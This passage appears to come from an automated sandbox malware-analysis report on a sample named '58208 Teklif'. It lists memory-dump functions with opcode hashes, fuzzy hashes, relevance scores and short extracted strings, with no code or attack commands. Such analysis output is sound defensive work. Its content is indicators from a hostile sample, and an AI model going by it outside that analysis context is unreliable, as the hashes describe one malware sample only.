                                                      • Opcode ID: 3d26fab91ef0b9cf149596682e8b469af42378624290afe0e1c717d63b877379
                                                      • Instruction ID: 6d342ff489d5988ae21f2a44b366ccc8ab04a1f8c3623c91b46a5058ec37c074
                                                      • Opcode Fuzzy Hash: 3d26fab91ef0b9cf149596682e8b469af42378624290afe0e1c717d63b877379
                                                      • Instruction Fuzzy Hash: 3BC1C074E01218CFDB54DFA5C994B9DBBB2BF89300F2091AAD409AB368DB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD6BC8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b85f8a4a5993cbebd152c9e1a95a4a092a044d1cbb8939634f62ce45e3e77dd8
                                                      • Instruction ID: 64defe44c8ce4d06eb12fadfd13201f73ca5c604e15afda5529dc3e6b88a1f22
                                                      • Opcode Fuzzy Hash: b85f8a4a5993cbebd152c9e1a95a4a092a044d1cbb8939634f62ce45e3e77dd8
                                                      • Instruction Fuzzy Hash: 55C1C074E01218CFDB54DFA5C994B9DBBB2BF89300F2091A9D408AB368EB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD6318 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b01ff81441b009d98d7f44f170d3bdb1e054e696e57ce78d1dc11c0e127004c8
                                                      • Instruction ID: 2c02f7cf2ff5c9b3fd09cccabdf3f98bc640493987134797241d977072d792b9
                                                      • Opcode Fuzzy Hash: b01ff81441b009d98d7f44f170d3bdb1e054e696e57ce78d1dc11c0e127004c8
                                                      • Instruction Fuzzy Hash: ACC1C174E01218CFDB54DFA5D994B9DBBB2BF89300F1091A9D808AB368EB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD6770 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd1a0e84afc98e25a4124b6b9af85443200877f5d9852053edec0ad1164a922a
                                                      • Instruction ID: 9021643bb68237ad0dd3dc9f109ab2cdb4b1c92b91863fb6f62b09d35624b2b1
                                                      • Opcode Fuzzy Hash: dd1a0e84afc98e25a4124b6b9af85443200877f5d9852053edec0ad1164a922a
                                                      • Instruction Fuzzy Hash: 1BC1C174E01218CFDB54DFA5D994B9DBBB2BF89300F1091AAD408AB368EB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD74A0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e82b10c9af06fba6ad44094ed669809a5c3e2eca4e87dc9258174b4e71e86a5
                                                      • Instruction ID: 137875de6031f1556edd4dacfd6e02b47b376a770689774df18758361d04605e
                                                      • Opcode Fuzzy Hash: 7e82b10c9af06fba6ad44094ed669809a5c3e2eca4e87dc9258174b4e71e86a5
                                                      • Instruction Fuzzy Hash: E2C1C074E01218CFDB54DFA5D994B9DBBB2BF89300F2091A9D408AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD0498 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1359652586b317cf8cc3ca4cef3d911a1c391ed749c8d023223f39038b60a46
                                                      • Instruction ID: e2c42d5d39b936cabccacd2efdc4bf1675a68dabac1f288ad31121fbe7626eb2
                                                      • Opcode Fuzzy Hash: b1359652586b317cf8cc3ca4cef3d911a1c391ed749c8d023223f39038b60a46
                                                      • Instruction Fuzzy Hash: 64C1C074E01218CFDB54DFA5D994B9DBBB2BF89300F2091A9D408AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD78F8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 41cb078260d7f4922937075d3cdba309593319a0282993e657268723e47bda16
                                                      • Instruction ID: 26c45fb556244d751bfe871a7d683efaa2a0afa42a012e708428a2445532d356
                                                      • Opcode Fuzzy Hash: 41cb078260d7f4922937075d3cdba309593319a0282993e657268723e47bda16
                                                      • Instruction Fuzzy Hash: 83C1C174E01218CFDB54DFA5C994B9DBBB2BF89300F2091A9D409AB368DB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD08F0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a996daf56a4ba164a13bb7029623d4defab6cbb1e34faa946e2e30d93ae8b06
                                                      • Instruction ID: a5c4e15d5659687b36445826d5996faf0c35d9af018f98663f65fb4c981d623e
                                                      • Opcode Fuzzy Hash: 5a996daf56a4ba164a13bb7029623d4defab6cbb1e34faa946e2e30d93ae8b06
                                                      • Instruction Fuzzy Hash: 18C1C074E01218CFDB54DFA9D994B9DBBB2BF89300F2091A9D409AB368DB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD7020 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42089f4ee390e54175a9a7a7b98758197d0276b68975dba1a6237b36956655a0
                                                      • Instruction ID: 92cf7f6e25ba5f28aff6409574f5274914d967a7f71364bf649b679aa7d4fc69
                                                      • Opcode Fuzzy Hash: 42089f4ee390e54175a9a7a7b98758197d0276b68975dba1a6237b36956655a0
                                                      • Instruction Fuzzy Hash: 38C1D174E01218CFDB54DFA5D994B9DBBB2BF89300F2091A9D808AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD0040 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8610b994d2f88fcb44b8d19fa1675bf335f6f3a9a1d1797556bf91e2f9e3023c
                                                      • Instruction ID: 6394262fa89cd494fa4cb8fd635d8924ed9a92c60abeebeec577d30a727904be
                                                      • Opcode Fuzzy Hash: 8610b994d2f88fcb44b8d19fa1675bf335f6f3a9a1d1797556bf91e2f9e3023c
                                                      • Instruction Fuzzy Hash: E0C1C074E01218CFDB54DFA5D994B9DBBB2BF89300F2091A9D808AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD81A8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9013e0b5db97dc7dc6739b8953fd01dc18d622a52630cce57409900e972c4b48
                                                      • Instruction ID: 9947fd331b112f0b2ef5cf7f26d27098876d34bc1ec8ad2449d3775143cf1d43
                                                      • Opcode Fuzzy Hash: 9013e0b5db97dc7dc6739b8953fd01dc18d622a52630cce57409900e972c4b48
                                                      • Instruction Fuzzy Hash: 64C1D074E01218CFDB54DFA5C994BADBBB2BF89300F2091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD11A0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc3e7b34df747de1bb25ad55198161986435d97adce349469f26250e644674ae
                                                      • Instruction ID: d7f7da3b3f371ab408abbf38929d73fbf57468566ceaf953383d4fa9264acaa6
                                                      • Opcode Fuzzy Hash: bc3e7b34df747de1bb25ad55198161986435d97adce349469f26250e644674ae
                                                      • Instruction Fuzzy Hash: 62C1D174E01218CFDB54DFA9C994B9DBBB2BF89300F1091A9D409AB368DB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD55E8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c670171314da592f7dfcf0c0e7b48b161008bb431c82c326806cb0b4d8000674
                                                      • Instruction ID: d9eac589f72dc1dd619228b2edb59d6893e74224051656aaa2786559863bed75
                                                      • Opcode Fuzzy Hash: c670171314da592f7dfcf0c0e7b48b161008bb431c82c326806cb0b4d8000674
                                                      • Instruction Fuzzy Hash: C0C1D274E01218CFDB54DFA5C994B9DBBB2BF89300F2091A9D409AB368DB355E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD7D50 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 171dc4c6a1715f0d63643f501f4e18dd0ff8f59c9a91a3f535e1c0b466df3339
                                                      • Instruction ID: e0bcbbaf665f9a3a906ecf72c0051509415095dc5f751f14b67aa61ab7b37313
                                                      • Opcode Fuzzy Hash: 171dc4c6a1715f0d63643f501f4e18dd0ff8f59c9a91a3f535e1c0b466df3339
                                                      • Instruction Fuzzy Hash: B1C1D074E01218CFDB54DFA5C994B9DBBB2BF89300F2091AAD408AB368DB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD0D48 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4516235f17dca76ef63da4dd437102173ce9225a19b60225bde94824c994c54f
                                                      • Instruction ID: cc879261d93f183663fd1e7280a7a348b7a970a1652fd86061f0ad0a840a45d0
                                                      • Opcode Fuzzy Hash: 4516235f17dca76ef63da4dd437102173ce9225a19b60225bde94824c994c54f
                                                      • Instruction Fuzzy Hash: EEC1D074E01218CFDB54DFA9D994B9DBBB2BF89300F2091A9D408AB368DB345E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0141F502 Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a17f09d8129333d2d180fa296c32b26de85343c2068525bb3731a9f459ac9ef5
                                                      • Instruction ID: 33b77594dd1119bcb4958ae9d5edec8f8500bc7ca08c685b063c5dca0bcf28cf
                                                      • Opcode Fuzzy Hash: a17f09d8129333d2d180fa296c32b26de85343c2068525bb3731a9f459ac9ef5
                                                      • Instruction Fuzzy Hash: B5C1D274E01218CFDB14DFA5D994B9DBBB2BF89300F2091AAD409AB368DB345E85CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD3808 Relevance: .2, Instructions: 222COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7248996c7bb6ee7884e9873e82a2823360074aa55b990d092d61d8debaf2e941
                                                      • Instruction ID: 900de86d5d57d072b2566c77f3f4e5e17246e1995188fb01836ba6d98ad97d4c
                                                      • Opcode Fuzzy Hash: 7248996c7bb6ee7884e9873e82a2823360074aa55b990d092d61d8debaf2e941
                                                      • Instruction Fuzzy Hash: BCB1A374E00218DFDB54DFA9D994A9DBBF2FF89300F1081A9E819AB365DB30A941CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A92240 Relevance: .2, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8e20a204dbfaca2ed7619a57c4456393bdf7c28ab0fb552f23369c1225ff4e8
                                                      • Instruction ID: e8525f39dceca3f09c63519f8b4b36166fa9d58c51d6af4a83a24e7cdd9b2b6a
                                                      • Opcode Fuzzy Hash: d8e20a204dbfaca2ed7619a57c4456393bdf7c28ab0fb552f23369c1225ff4e8
                                                      • Instruction Fuzzy Hash: 8EA10474D00218CFDB14DFA9C998BDDBBB1FF89310F248269E419AB2A1DB745985CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05A92586 Relevance: .2, Instructions: 202COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3789424768.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_5a90000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 550a26475402f8b09707bb3e590773bc48005803b41b4e775d58e3228eafd2b4
                                                      • Instruction ID: 76da3239c6b42fd00f2a81e71bd4c41ba407cc517895cbbe75c9b94a12c64ea6
                                                      • Opcode Fuzzy Hash: 550a26475402f8b09707bb3e590773bc48005803b41b4e775d58e3228eafd2b4
                                                      • Instruction Fuzzy Hash: C191F074D00218DFDB14DFA9C898BADBBF1FF49310F248269E419AB291DB749985CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BD3803 Relevance: .1, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa7bffdb1fa4934a01959c7462e0cdbfcc94b1ae95ba311e73f642668b6ddaee
                                                      • Instruction ID: 0fba9721ab6aea1cdc8f3e2ed52d4b726f75a91840299dcc8bc5db4b9c740000
                                                      • Opcode Fuzzy Hash: aa7bffdb1fa4934a01959c7462e0cdbfcc94b1ae95ba311e73f642668b6ddaee
                                                      • Instruction Fuzzy Hash: 0A51B4B4E01608CFDB48DFAAD99499DBBF2FF89300F149169D419AB365EB309842CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDE5D8 Relevance: 5.1, Strings: 4, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xcq$Xcq$Xcq$Xcq
                                                      • API String ID: 0-2577476577
                                                      • Opcode ID: fafbdeea15f8c59185ab1586f69159fc64979b6556cf08cf5761bbea39e6925b
                                                      • Instruction ID: bb4d174e6c9e55fcde7efee758884e088ea4abdee2515577d809a765d6008bf9
                                                      • Opcode Fuzzy Hash: fafbdeea15f8c59185ab1586f69159fc64979b6556cf08cf5761bbea39e6925b
                                                      • Instruction Fuzzy Hash: F141F9B5E4412A4BDBB45A68C9407BF76A5EB84350F1111F5C91AAF380FB30DD82DBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06BDE5C8 Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3790136651.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_6bd0000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xcq$Xcq$Xcq$Xcq
                                                      • API String ID: 0-2577476577
                                                      • Opcode ID: 69aae4631a80e0e24325c7a020c9e0edec6fa71d936a8cb8986a6ef0a98eb3b8
                                                      • Instruction ID: 14770dc319f23a31945bc6d38c8df937a001d7831666bbe088dc5a6e5d41038b
                                                      • Opcode Fuzzy Hash: 69aae4631a80e0e24325c7a020c9e0edec6fa71d936a8cb8986a6ef0a98eb3b8
                                                      • Instruction Fuzzy Hash: A831C8B4E4022A4BDFB58A68C5407BF66A5EB84300F5411F9C91AAF685FB30CD42DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 014160E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3766476904.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1410000_58208 Teklif.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \;_q$\;_q$\;_q$\;_q
                                                      • API String ID: 0-294077808
                                                      • Opcode ID: a014bcf9c0871e953af28a886736b59fba59fa41c8a87319fa4d4354b96184b0
                                                      • Instruction ID: 9147a99626e74d181b9ef993d2ca4ad595501c0ab813f5d66d776f05923648e1
                                                      • Opcode Fuzzy Hash: a014bcf9c0871e953af28a886736b59fba59fa41c8a87319fa4d4354b96184b0
                                                      • Instruction Fuzzy Hash: 2A01F7327400198FDB648E2CC45492677EBAF89B60726856BE406CB37EDAB1DC42C780
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%